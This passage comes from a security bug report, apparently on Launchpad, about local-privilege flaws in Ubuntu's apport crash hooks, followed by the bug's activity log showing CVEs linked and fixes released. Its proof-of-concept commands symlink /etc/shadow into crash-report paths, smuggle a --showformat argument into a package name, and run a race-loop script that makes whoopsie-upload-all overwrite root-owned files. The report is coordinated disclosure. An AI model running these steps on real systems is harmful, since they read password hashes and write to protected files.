report['ProcCwd']         pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])         if pid_line:             pid = pid_line.groups()[0]             path = "%s/hs_err_pid%s.log" % (cwd, pid)             # make sure if exists             if os.path.exists(path):                 content = read_file(path)                 # truncate if bigger than 100 KB                 # see LP: #1696814                 max_length = 100*1024                 if sys.getsizeof(content) < max_length:                     report['HotspotError'] = content                     report['Tags'] += ' openjdk-hs-err'                 else:                     report['HotspotError'] = content[:max_length] + \                             "\n[truncated by openjdk-11 apport hook]" + \                             "\n[max log size is %s, file size was %s]" % \                             (si_units(max_length), si_units(sys.getsizeof(content)))                     report['Tags'] += ' openjdk-hs-err' ``` By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`. ### PoC ``` $ sudo apt install openjdk-14-jdk $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 1 $ ln -s /etc/shadow /home/user/hs_err_pid0.log $ pid=$'\t0';cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus:  Pid:$pid  Uid:$pid EOF $ grep -A3 root: /var/crash/poc.crash  root:!:18393:0:99999:7:::  daemon:*:18375:0:99999:7:::  bin:*:18375:0:99999:7:::  sys:*:18375:0:99999:7::: ``` ## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info) The root cause of this issue stems from the fact, that a potentially user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report: Note: Requires `fs.protected_symlinks=0` ```Python def attach_3d_info(report, ui=None):     ...     # Compiz internal state if compiz crashed     if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:         compiz_pid = 0         pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])         if pid_line:             compiz_pid = pid_line.groups()[0]         compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid         attach_file_if_exists(report, compiz_state_file, "compiz_internal_states") ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks=0 fs.protected_symlinks = 0 $ ln -s /etc/shadow /tmp/compiz_internal_state0 $ cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: source_xorg 123 SourcePackage: compiz ProcStatus:  Pid: EOF $ grep -A3 compiz_internal poc.crash compiz_internal_states:  root:!:18686:0:99999:7:::  daemon:*:18474:0:99999:7:::  bin:*:18474:0:99999:7::: ``` ## Issue 3: Spoof modified config files via argument injection (Info) The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name: ```Python def get_modified_conffiles(self, package): ...     dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',                               package], stdout=subprocess.PIPE) ``` By supplying a `package` name such as `--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report. Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response of the user to finally include the file in the crash report. ### PoC ``` $ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2  /etc/shadow 1       shadow 1 ``` ## Issue 4: Arbitrary file write in whoopsie-upload-all (Info) After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution. Note: Requires `fs.protected_symlinks=0` ```Python def process_report(report):     '''Collect information for a report and mark for whoopsie upload     ...         # write updated report, we use os.open and os.fdopen as         # /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)         fd = os.open(report, os.O_WRONLY | os.O_APPEND)         with os.fdopen(fd, 'wb') as f:             os.chmod(report, 0)             r.write(f, only_new=True)             os.chmod(report, 0o640) ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 0 $ cat ex.sh TARGET="/JRN" while :; do   FN="/var/crash/$RANDOM.poc.crash"   pid=$'\t0';cat << EOF > $FN ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus:  Pid:$pid  Uid:$pid EOF   while :; do     if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi   done   sleep 0.3   rm -f $FN   ln -s $TARGET $FN   if [ -s /JRN ]; then echo DONE.; break; fi done $ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/ -rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN $ bash ex.sh DONE. $ ls -l /JRN; sudo head -n3 /JRN -rw-r----- 1 root root 105028 M�r 3 14:16 /JRN ApportVersion: 2.20.11-0ubuntu27.16 Architecture: amd64 CasperMD5CheckResult: skip ``` # Credits Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues. Best regards, maik
2021-05-08 19:34:38 mal bug task added openjdk-lts (Ubuntu)
2021-05-08 20:01:03 Marc Deslauriers affects apport apport (Ubuntu)
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32547
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32548
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32549
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32550
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32551
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32552
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32553
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32554
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32555
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32556
2021-05-10 22:44:12 Seth Arnold cve linked 2021-32557
2021-05-13 16:06:32 Marc Deslauriers bug added subscriber Brian Murray
2021-05-13 16:06:44 Marc Deslauriers nominated for series Ubuntu Impish
2021-05-13 16:06:44 Marc Deslauriers bug task added apport (Ubuntu Impish)
2021-05-13 16:06:44 Marc Deslauriers bug task added openjdk-lts (Ubuntu Impish)
2021-05-13 16:06:44 Marc Deslauriers nominated for series Ubuntu Focal
2021-05-13 16:06:44 Marc Deslauriers bug task added apport (Ubuntu Focal)
2021-05-13 16:06:44 Marc Deslauriers bug task added openjdk-lts (Ubuntu Focal)
2021-05-13 16:06:44 Marc Deslauriers nominated for series Ubuntu Groovy
2021-05-13 16:06:44 Marc Deslauriers bug task added apport (Ubuntu Groovy)
2021-05-13 16:06:44 Marc Deslauriers bug task added openjdk-lts (Ubuntu Groovy)
2021-05-13 16:06:44 Marc Deslauriers nominated for series Ubuntu Hirsute
2021-05-13 16:06:44 Marc Deslauriers bug task added apport (Ubuntu Hirsute)
2021-05-13 16:06:44 Marc Deslauriers bug task added openjdk-lts (Ubuntu Hirsute)
2021-05-13 16:06:44 Marc Deslauriers nominated for series Ubuntu Bionic
2021-05-13 16:06:44 Marc Deslauriers bug task added apport (Ubuntu Bionic)
2021-05-13 16:06:44 Marc Deslauriers bug task added openjdk-lts (Ubuntu Bionic)
2021-05-13 16:07:18 Marc Deslauriers attachment added proposed hirsute debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497134/+files/pam_1.3.1-5ubuntu6.21.04.1.debdiff
2021-05-13 16:07:43 Marc Deslauriers attachment added proposed groovy debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497135/+files/pam_1.3.1-5ubuntu6.20.10.1.debdiff
2021-05-13 16:08:12 Marc Deslauriers attachment added proposed focal debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497136/+files/pam_1.3.1-5ubuntu4.2.debdiff
2021-05-13 16:08:41 Marc Deslauriers attachment added proposed bionic debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497137/+files/pam_1.1.8-3.6ubuntu2.18.04.3.debdiff
2021-05-13 16:42:28 Marc Deslauriers attachment removed proposed hirsute debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497134/+files/pam_1.3.1-5ubuntu6.21.04.1.debdiff
2021-05-13 16:42:41 Marc Deslauriers attachment removed proposed groovy debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497135/+files/pam_1.3.1-5ubuntu6.20.10.1.debdiff
2021-05-13 16:42:52 Marc Deslauriers attachment removed proposed bionic debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497137/+files/pam_1.1.8-3.6ubuntu2.18.04.3.debdiff
2021-05-13 16:43:03 Marc Deslauriers attachment removed proposed focal debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497136/+files/pam_1.3.1-5ubuntu4.2.debdiff
2021-05-13 16:43:41 Marc Deslauriers attachment added proposed hirsute debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497170/+files/apport_2.20.11-0ubuntu65.1.debdiff
2021-05-13 16:44:02 Marc Deslauriers attachment added proposed groovy debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497171/+files/apport_2.20.11-0ubuntu50.7.debdiff
2021-05-13 16:44:23 Marc Deslauriers attachment added proposed focal debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497172/+files/apport_2.20.11-0ubuntu27.18.debdiff
2021-05-13 16:44:42 Marc Deslauriers attachment added proposed bionic debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497173/+files/apport_2.20.9-0ubuntu7.24.debdiff
2021-05-25 16:42:41 Marc Deslauriers bug task deleted openjdk-lts (Ubuntu)
2021-05-25 16:44:21 Launchpad Janitor apport (Ubuntu Hirsute): status New Fix Released
2021-05-25 16:44:24 Launchpad Janitor apport (Ubuntu Bionic): status New Fix Released
2021-05-25 16:45:40 Launchpad Janitor apport (Ubuntu Groovy): status New Fix Released
2021-05-25 16:45:41 Launchpad Janitor apport (Ubuntu Focal): status New Fix Released
2021-05-25 19:31:31 Marc Deslauriers information type Private Security Public Security
2021-05-25 19:50:44 Marc Deslauriers information type Public Security Private Security
2021-05-25 19:55:47 Marc Deslauriers removed subscriber Brian Murray
2021-05-26 00:45:21 Launchpad Janitor apport (Ubuntu Impish): status New Fix Released
2021-05-27 18:41:53 Launchpad Janitor branch linked lp:~ubuntu-core-dev/ubuntu/impish/apport/ubuntu
2021-06-12 00:47:53 Seth Arnold information type Private Security Public Security
2021-06-14 13:49:40 SatoshiNakamoto branch unlinked lp:~ubuntu-core-dev/ubuntu/impish/apport/ubuntu
2021-06-19 21:59:37 SatoshiNakamoto apport (Ubuntu Bionic): assignee SatoshiNakamoto (evansanita713)
2021-06-19 22:15:54 Marc Deslauriers apport (Ubuntu Bionic): assignee SatoshiNakamoto (evansanita713)
2021-06-19 22:28:07 SatoshiNakamoto apport (Ubuntu Bionic): assignee SatoshiNakamoto (evansanita713)
2021-06-19 22:28:25 SatoshiNakamoto apport (Ubuntu Focal): assignee SatoshiNakamoto (evansanita713)
2021-06-19 22:28:38 SatoshiNakamoto apport (Ubuntu Groovy): assignee SatoshiNakamoto (evansanita713)
2021-06-19 22:28:57 SatoshiNakamoto apport (Ubuntu Hirsute): assignee SatoshiNakamoto (evansanita713)
2021-06-19 22:29:11 SatoshiNakamoto apport (Ubuntu Impish): assignee SatoshiNakamoto (evansanita713)
2021-06-19 22:29:26 SatoshiNakamoto information type Public Security Private Security
2021-06-19 23:06:56 Marc Deslauriers apport (Ubuntu Bionic): assignee SatoshiNakamoto (evansanita713)
2021-06-19 23:07:04 Marc Deslauriers apport (Ubuntu Focal): assignee SatoshiNakamoto (evansanita713)
2021-06-19 23:07:16 Marc Deslauriers apport (Ubuntu Groovy): assignee SatoshiNakamoto (evansanita713)
2021-06-19 23:07:23 Marc Deslauriers apport (Ubuntu Hirsute): assignee SatoshiNakamoto (evansanita713)
2021-06-19 23:07:32 Marc Deslauriers apport (Ubuntu Impish): assignee SatoshiNakamoto (evansanita713)
2021-06-19 23:07:38 Marc Deslauriers information type Private Security Public Security
2021-06-30 01:14:56 SatoshiNakamoto apport (Ubuntu Impish): assignee SatoshiNakamoto (evansanita713)
2021-06-30 01:42:25 Marc Deslauriers apport (Ubuntu Impish): assignee SatoshiNakamoto (evansanita713)
2022-06-27 10:29:00 Benjamin Drung bug task added apport
2022-06-27 10:29:28 Benjamin Drung apport: importance Undecided Critical
2022-06-27 10:29:28 Benjamin Drung apport: status New Fix Released
2022-06-27 10:29:28 Benjamin Drung apport: milestone 2.21.0